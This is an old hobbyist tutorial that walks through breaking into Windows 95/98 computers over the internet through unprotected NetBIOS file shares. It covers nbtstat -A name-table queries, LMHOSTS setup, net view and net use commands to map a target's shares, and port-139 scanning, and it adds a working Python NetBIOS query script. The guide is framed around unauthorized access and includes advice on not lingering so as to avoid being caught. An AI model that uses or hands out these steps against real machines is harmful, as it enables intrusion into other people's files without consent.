First off, let me say that you may not find this the easiest way of hacking, but then again you want to be a hacker, right? A lot of hacking is trial and error. The feeling you get when YOU actually break into a system is much more fulfilling than when you run some downloaded proggie. One thing to get straight before you start: a personal firewall blocks inbound connections to your own box, it does not hide you. Every nbtstat query and every net use you send carries your own IP address and the target can log it, so do not count on a firewall to keep you from being traced. You should attempt this hack (like all others) on yourself first so you know exactly what's going on when you finally get into a system. Spending too much time on a system could arouse suspicion and lead to getting caught.
There are three requirements for using this method of hacking:
1) You need nbtstat. It comes with Windows' own TCP/IP networking, so if your box is on the internet you already have it. Open a DOS prompt and type nbtstat and you should see the list of switches shown below. If you get "Bad command or file name" instead, add the TCP/IP protocol under Control Panel > Network rather than hunting for a copy on the internet.
2) The target must be a Windows box running 95 or 98 with the default share-level security, where the only thing protecting a share is a password set on the share itself (or nothing at all). Windows NT and 2000 also run NetBIOS over TCP/IP and SMB, so nbtstat -A works against them too, but they use user-level security: net use will ask for the username and password of an account on that machine, and without one this walk-through stops there.
3) The target must have file sharing permissions on. (I will tell you how to check for this further into the hack.)
First you need to obtain the IP address of the target. If you don't know what that is, read my definitions page first.
When you type nbtstat /? (or just nbtstat with no switches) at a DOS prompt you should see the following table:
C:\WINDOWS>nbtstat

Displays protocol statistics and current TCP/IP connections
using NBT (NetBIOS over TCP/IP).

NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n]
        [-r] [-R] [-s] [-S] [interval]

  -a  (adapter status)  Lists the remote machine's name table given its name
  -A  (Adapter status)  Lists the remote machine's name table given its IP address
  -c  (cache)           Lists the remote name cache including the IP addresses
  -n  (names)           Lists local NetBIOS names
  -r  (resolved)        Lists names resolved by broadcast and via WINS
  -R  (Reload)          Purges and reloads the remote cache name table
  -S  (Sessions)        Lists sessions table with the destination IP addresses
  -s  (sessions)        Lists sessions table converting destination IP
                        addresses to names via the hosts file

  RemoteName   Remote host machine name.
  IP address   Dotted decimal representation of the IP address.
  interval     Redisplays selected statistics, pausing interval seconds
               between each display. Press Ctrl+C to stop redisplaying
               statistics.
------------------------------------------------------------------------------------------------------------
What we want to do is pull the name table from the IP address, so we use option -A (the capital matters: lowercase -a takes a NetBIOS name instead of an IP). You can figure out the other switches on your own later, as this is just meant as an introductory tutorial.
So we type the command with the proper switch and IP address.
Example: nbtstat -A 127.0.0.1
The table that appears should look like this:
--------------------------------------------------------------------------------------------------------------
C:\WINDOWS>nbtstat -A 255.255.255.25

       NetBIOS Remote Machine Name Table

   Name               Type         Status
---------------------------------------------
COMPUTER-1     <00>  UNIQUE      Registered
WORKGROUP      <00>  GROUP       Registered
COMPNAME-1     <03>  UNIQUE      Registered
COMPNAME-1     <20>  UNIQUE      Registered
USERNAME       <03>  UNIQUE      Registered
WORKGROUP      <1E>  GROUP       Registered

MAC Address = 44-45-53-54-00-00
--------------------------------------------------------------------------------------------------------------
Ok. See that <20>? That suffix is the File Server Service: the box has file and printer sharing turned on and is registering itself as a server. For reference, <00> is the Workstation Service and <03> is the Messenger Service (a <03> entry that isn't the computer name is a logged-on user name, which is why USERNAME shows up). If there is no <20> in the table, nothing is shared and you can stop here. Now, what you want to do next is create an "LMHOSTS" file in your C:\WINDOWS directory so your box can map the target's NetBIOS name to its IP address instead of broadcasting for it on your own LAN. Type edit at the prompt, and in the editor type one line: the IP address, then press the tab key three times, then the name to the left of the <20>.
Example (this is the contents of the file, one line):
255.255.255.25			COMPNAME-1
When the blue DOS editor pops up hit "ALT", then "F", then "A". In the Save As box type C:\WINDOWS\LMHOSTS (without the quotes, and with no extension: a file called LMHOSTS.TXT is ignored). Windows 9x ships a commented sample of the format as LMHOSTS.SAM in the same directory if you want to see more options.
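Here is what nbtstat -A actually puts on the wire and what it gets back, written out as a Python script. This is an added example for this page, not part of the original text and not Windows' own nbtstat: it builds the RFC 1002 node status request that goes to UDP port 137, parses the reply, picks out the <20> (File Server Service) name the same way the text tells you to by eye, and prints the LMHOSTS line for it. The reply embedded in the script is constructed to match the sample table above (host names, suffixes and MAC are taken from that table, the flag values are assumed typical ones); the query() function does the live version against a real target and is not exercised by the sample run.

```python
"""NetBIOS Node Status (NBSTAT) client: the UDP/137 query behind `nbtstat -A`.

Added example for this page, not the original author's code. Frame layout follows
RFC 1002; the sample reply below is constructed to match the table in the text."""
import random
import socket
import struct

NB_PORT = 137
NBSTAT_TYPE = 0x0021   # RR type for node status
NB_CLASS_IN = 0x0001
# RFC 1001 name suffixes; <20> is the one the tutorial looks for.
SUFFIX = {0x00: "Workstation Service", 0x03: "Messenger Service",
          0x1E: "Browser Service Elections", 0x20: "File Server Service"}


def encode_name(name: bytes) -> bytes:
    """First-level encoding: pad to 16 bytes, then write each nibble as 'A' + nibble.
    The wildcard '*' (0x2A) plus 15 NULs becomes b'CK' + b'AA' * 15."""
    out = bytearray()
    for b in name.ljust(16, b"\x00"):
        out += bytes((0x41 + (b >> 4), 0x41 + (b & 0x0F)))
    return bytes(out)


def build_node_status_request(trn_id: int) -> bytes:
    """12-byte header (flags 0 = query, QDCOUNT 1) + question for '*' of type NBSTAT."""
    header = struct.pack(">HHHHHH", trn_id, 0x0000, 1, 0, 0, 0)
    question = b"\x20" + encode_name(b"*") + b"\x00"
    return header + question + struct.pack(">HH", NBSTAT_TYPE, NB_CLASS_IN)


def parse_node_status_response(data: bytes, trn_id=None) -> dict:
    """Return {'names': [(name, suffix, is_group, is_active), ...], 'mac': 'xx-xx-...'}."""
    if len(data) < 12:
        raise ValueError("short packet")
    rid, flags, _qd, an, _ns, _ar = struct.unpack(">HHHHHH", data[:12])
    if trn_id is not None and rid != trn_id:
        raise ValueError("transaction id mismatch")
    if not flags & 0x8000 or an < 1:
        raise ValueError("not a response carrying an answer")
    off = 12
    while data[off] != 0:          # skip the RR name (length-prefixed labels)
        off += 1 + data[off]
    off += 1
    rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", data[off:off + 10])
    off += 10
    if rtype != NBSTAT_TYPE:
        raise ValueError("unexpected RR type 0x%04X" % rtype)
    rdata = data[off:off + rdlen]
    names, pos = [], 1
    for _ in range(rdata[0]):      # NUM_NAMES entries: 15-byte name, suffix, 2 flag bytes
        raw, suffix, nflags = struct.unpack(">15sBH", rdata[pos:pos + 18])
        pos += 18
        names.append((raw.rstrip(b" \x00").decode("latin-1"), suffix,
                      bool(nflags & 0x8000), bool(nflags & 0x0400)))
    mac = "-".join("%02X" % b for b in rdata[pos:pos + 6])   # UNIT_ID = adapter MAC
    return {"names": names, "mac": mac}


def file_server_name(info: dict):
    """Name registered with suffix <20> (the box is sharing); None if nothing is shared."""
    for name, suffix, is_group, is_active in info["names"]:
        if suffix == 0x20 and not is_group and is_active:
            return name
    return None


def lmhosts_line(ip: str, info: dict):
    """The line for C:\\WINDOWS\\LMHOSTS: IP, tab, server name (None if there is no <20>)."""
    name = file_server_name(info)
    return None if name is None else "%s\t%s" % (ip, name)


def query(ip: str, timeout: float = 2.0) -> dict:
    """Live equivalent of `nbtstat -A ip`; needs network reach to UDP/137 on the target."""
    trn_id = random.randrange(1, 0x10000)
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(timeout)
    try:
        sock.sendto(build_node_status_request(trn_id), (ip, NB_PORT))
        data, _ = sock.recvfrom(4096)
    finally:
        sock.close()
    return parse_node_status_response(data, trn_id)


def _entry(name: str, suffix: int, group: bool = False) -> bytes:
    """One NODE_NAME entry; flags 0x0400 = ACT (registered), 0x8000 = group name (assumed)."""
    flags = 0x0400 | (0x8000 if group else 0)
    return struct.pack(">15sBH", name.ljust(15).encode(), suffix, flags)


# Constructed reply mirroring the sample table in the text (not a real capture).
SAMPLE_RDATA = (bytes([6]) + _entry("COMPUTER-1", 0x00) + _entry("WORKGROUP", 0x00, True)
                + _entry("COMPNAME-1", 0x03) + _entry("COMPNAME-1", 0x20)
                + _entry("USERNAME", 0x03) + _entry("WORKGROUP", 0x1E, True)
                + bytes.fromhex("444553540000") + b"\x00" * 40)   # MAC + zeroed statistics
SAMPLE_REPLY = (struct.pack(">HHHHHH", 0x1234, 0x8400, 0, 1, 0, 0)
                + b"\x20" + encode_name(b"*") + b"\x00"
                + struct.pack(">HHIH", NBSTAT_TYPE, NB_CLASS_IN, 0, len(SAMPLE_RDATA))
                + SAMPLE_RDATA)

if __name__ == "__main__":
    info = parse_node_status_response(SAMPLE_REPLY, 0x1234)
    for name, suffix, is_group, is_active in info["names"]:
        print("%-15s <%02X>  %-6s  %-10s  %s" % (name, suffix, "GROUP" if is_group else "UNIQUE",
                                                 "Registered" if is_active else "-", SUFFIX.get(suffix, "")))
    print("MAC Address =", info["mac"])
    print("LMHOSTS line:", lmhosts_line("255.255.255.25", info))
```

Running the script as-is parses the constructed reply and prints the same six rows and MAC as the table above, plus the LMHOSTS line for COMPNAME-1. Two things it makes visible that nbtstat hides: the request is a plain UDP datagram with your own IP in it (so much for the firewall hiding you), and a host can answer on 137 with a full name table and still have no <20>, in which case file_server_name() returns None and there is nothing to net use.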
In order to access the system your own box needs the client half of Microsoft networking, "Client for Microsoft Networks", which is what Find Computer and net use run on. Open your control panel, double click the Network icon, and if it isn't listed under the Configuration tab click Add > Client > Microsoft > Client for Microsoft Networks. You do not need to turn on File and Print Sharing to connect to someone else's shares; that button installs the server half and makes your own box show a <20> to anyone who points nbtstat -A at you. After choosing OK, Windows will install a few drivers and restart.
IMPORTANT NOTE: IF YOU DID TURN ON FILE SHARING, GO BACK INTO THE NETWORK SETTINGS AND DISABLE IT WHEN YOU ARE DONE, OR YOU WILL BE SUSCEPTIBLE TO BEING HACKED BY THIS EXACT METHOD. While it is on, every share you created is one net use away for anyone who finds you.
Go to Start menu \ Find \ Computer and tell it to find the name the computer was labeled, i.e. COMPNAME-1. This is where the LMHOSTS entry earns its keep: without it, Find only broadcasts the name on your own LAN and will never reach a box out on the internet.
Or, if you prefer hacking from DOS (as I do), list the shares first:
c:\>net view \\[IP address]
You will see a list of share names. Choose one and map it to a drive letter:
c:\>net use g: \\[IP address]\[Sharename]
If the owner set a password on the share, net use will prompt you for it; a 9x share with no password just connects. After that g: is the remote share (dir g: shows you what is there), and net use g: /delete drops the connection when you are finished.
That's about it. I will be adding a few pages below that explain different variations/options that you can play with.
Here's an additional hint:
When using a port scanner to look for IPs that are vulnerable to this attack, look for open TCP port 139, the NetBIOS Session Service that file sharing (SMB) runs over. nbtstat -A itself talks to UDP port 137, the NetBIOS Name Service, so a box can answer your nbtstat query and still have nothing shared and nothing listening on 139. Port 139 open plus a <20> in the name table is the combination you want.
This document was written as a newbie text by DIDIT 2-XS. You may duplicate, copy, or link your site to this page if you want. The link address to this page is: www.geocities.com/lake327/nbtstat.html.
Please do not remove my name from this text or take credit for my work. If you choose to copy this document you should copy it in its entirety (including this paragraph). Have fun, be careful, and remember to KEEP IT FREE!